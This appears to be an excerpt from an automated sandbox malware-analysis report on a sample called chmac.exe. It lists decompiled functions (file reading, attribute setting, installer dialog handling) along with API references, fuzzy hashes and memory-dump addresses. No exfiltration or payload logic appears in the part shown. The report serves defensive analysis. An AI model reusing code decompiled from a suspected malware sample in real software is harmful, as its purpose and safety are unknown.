Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423ed0; // 0x810694
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x00401392
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040575C, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405760
0x0040576d
0x00405782
0x00405788

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,80000000,00000003), ref: 00405760
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040573D, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040573D(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}

0x00405741
0x0040574a
0x00405753
0x00000000
0x00405753
0x00405759

APIs

GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405753

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A

Uniqueness

Uniqueness Score: -1.00%

Function 004031A8, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004031ac
0x004031bf
0x004031c7
0x00000000
0x004031ce
0x00000000
0x004031d0

APIs

ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004031DA, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}

0x004031e8
0x004031ee

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,000621E4), ref: 004031E8

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404772, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8; // 0x80fa4c
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423eb0; // 0x80f8a0
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423eb9 & 0x00000002;
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423eb8; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420474;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42048c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420474 = _t315;
									 *0x42048c = _t315;
									 *0x423f00 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423eb9 & 0x00000001;
										if(( *0x423eb9 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423ecc - _t315; // 0x3
										_v32 =  *0x42048c;
										_t196 =  *0x423ec8; // 0x80fa4c
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42367c; // 0x81623d
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E00404610(0x3ff, 0xfffffffb, E004046C5(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x80fa54
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x80fa64
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423ecc; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42048c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423f00 = _a4;
					_t247 =  *0x423ecc; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423ecc - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423ecc; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404790
0x00404796
0x00404798
0x0040479e
0x004047a4
0x004047a7
0x004047b1
0x004047ba
0x004047bd
0x004047c0
0x004049e8
0x004049e8
0x004049ef
0x00404a03
0x004049f1
0x004049f3
0x004049f6
0x004049f7
0x004049fe
0x004049fe
0x00404a06
0x00404a0f
0x00404a1a
0x00404a1a
0x00404a1d
0x00404a20
0x00404a2f
0x00404a2f
0x00404a36
0x00404aae
0x00404aae
0x00404ab1
0x00404ab3
0x00404ab6
0x00404abd
0x00404acb
0x00404acb
0x00404acd
0x00404ad0
0x00404ad7
0x00404ad9
0x00404add
0x00404afa
0x00404afe
0x00404afe
0x00404adf
0x00404aec
0x00404aec
0x00404add
0x00404ad7
0x00000000
0x00404ab1
0x00404a38
0x00404a3b
0x00404a46
0x00404a48
0x00404a4b
0x00404a52
0x00404a57
0x00404a59
0x00404a63
0x00404a63
0x00404a67
0x00404a69
0x00404a6c
0x00404a6e
0x00404a71
0x00404a87
0x00404a87
0x00404a73
0x00404a73
0x00404a79
0x00404a7b
0x00404a82
0x00404a7d
0x00404a7d
0x00404a7d
0x00404a7b
0x00404a8b
0x00404a8d
0x00404a92
0x00404a9b
0x00404a9c
0x00404aa6
0x00404aa6
0x00404aa8
0x00404aab
0x00404aab
0x00404a6c
0x00000000
0x00404a59
0x00404a3d
0x00404a40
0x00404a44
0x00000000
0x00000000
0x00000000
0x00404a44
0x00404a22
0x00404a29
0x00000000
0x00000000
0x00000000
0x00404a11
0x00404a11
0x00404a14
0x00404b01
0x00404b01
0x00404b08
0x00404b7c
0x00404b7c
0x00404b83
0x00404b8f
0x00404b8f
0x00404b91
0x00404b98
0x00404b9a
0x00404b9f
0x00404ba1
0x00404ba4
0x00404ba4
0x00404baa
0x00404baf
0x00404bb1
0x00404bb4
0x00404bb4
0x00404bba
0x00404bc0
0x00404bc6
0x00404bc6
0x00404bcc
0x00404bd3
0x00404d20
0x00404d20
0x00404d27
0x00404d29
0x00404d30
0x00404d34
0x00404d41
0x00404d41
0x00404d44
0x00404d4a
0x00404d5c
0x00404d5c
0x00404d30
0x00000000
0x00404bd9
0x00404bdb
0x00404be0
0x00404be3
0x00404be7
0x00404be7
0x00404bec
0x00404bef
0x00404c30
0x00404c32
0x00404c3c
0x00404c42
0x00404c45
0x00404c4a
0x00404c51
0x00404c54
0x00404cf6
0x00404cfc
0x00404d02
0x00404d07
0x00404d0a
0x00404d1b
0x00404d1b
0x00000000
0x00404c5a
0x00404c5a
0x00404c5a
0x00404c5d
0x00404c63
0x00404c66
0x00404c68
0x00404c6a
0x00404c6c
0x00404c6f
0x00404c72
0x00404c79
0x00404c7b
0x00404c7e
0x00404c85
0x00404c88
0x00404c88
0x00404c88
0x00404c88
0x00404c8c
0x00404c8f
0x00404c9b
0x00404c9c
0x00404c9f
0x00404ca1
0x00404ca1
0x00404ca1
0x00404c91
0x00404c93
0x00404c93
0x00404cc0
0x00404cc0
0x00404cc1
0x00404ccd
0x00404cdc
0x00404cdc
0x00404cde
0x00404ce1
0x00404cea
0x00404cea
0x00000000
0x00404c5d
0x00404bf1
0x00404bfc
0x00404bff
0x00404c04
0x00404c06
0x00404c08
0x00404c0a
0x00404c1a
0x00404c24
0x00404c26
0x00404c29
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c0c
0x00404c0c
0x00404c0c
0x00404c0f
0x00404c12
0x00404c14
0x00404c14
0x00404c14
0x00404c15
0x00404c16
0x00404c16
0x00000000
0x00404c0c
0x00404bef
0x00404bd3
0x00404b0a
0x00404b10
0x00000000
0x00000000
0x00404b1c
0x00404b20
0x00000000
0x00000000
0x00404b30
0x00404b32
0x00404b35
0x00000000
0x00000000
0x00404b47
0x00404b49
0x00404b4c
0x00404b56
0x00404b58
0x00404b59
0x00404b5a
0x00404b69
0x00404b6b
0x00404b72
0x00404b75
0x00000000
0x00404b75
0x00404b4e
0x00404b51
0x00404b54
0x00000000
0x00000000
0x00000000
0x00404b54
0x00000000
0x00404a14
0x004047c6
0x004047cb
0x004047d0
0x004047d5
0x004047d6
0x004047df
0x004047ea
0x004047f5
0x004047fb
0x00404809
0x0040481e
0x00404823
0x0040482e
0x00404837
0x0040484c
0x0040485d
0x0040486a
0x0040486a
0x0040486f
0x00404875
0x00404877
0x0040487a
0x0040487f
0x00404884
0x00404886
0x00404886
0x004048a6
0x004048a6
0x004048a8
0x004048a9
0x004048ae
0x004048b1
0x004048b4
0x004048b8
0x004048bd
0x004048c2
0x004048c6
0x004048cb
0x004048d0
0x004048d2
0x004048d4
0x004048da
0x004049a4
0x004049b7
0x00000000
0x004048e0
0x004048e3
0x004048e6
0x004048e9
0x004048e9
0x004048ef
0x004048f5
0x004048f8
0x004048fe
0x004048ff
0x00404904
0x0040490d
0x00404914
0x00404917
0x0040491a
0x0040491d
0x00404957
0x00404959
0x00404982
0x0040495b
0x00404968
0x00404968
0x0040491f
0x00404922
0x00404931
0x0040493b
0x00404943
0x0040494a
0x00404952
0x00404952
0x0040491d
0x00404988
0x00404989
0x0040498f
0x00404995
0x00404995
0x004049a2
0x004049bd
0x004049c1
0x004049de
0x004049e3
0x004049e6
0x004049e6
0x00000000
0x004049c3
0x004049c8
0x004049d1
0x00404d5e
0x00404d70
0x00404d70
0x004049c1
0x00000000
0x004049a2
0x004048da

APIs

GetDlgItem.USER32 ref: 00404789
GetDlgItem.USER32 ref: 00404796
GlobalAlloc.KERNEL32(00000040,00000003), ref: 004047E2
LoadBitmapA.USER32 ref: 004047F5
SetWindowLongA.USER32(?,000000FC,00404D73), ref: 0040480F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
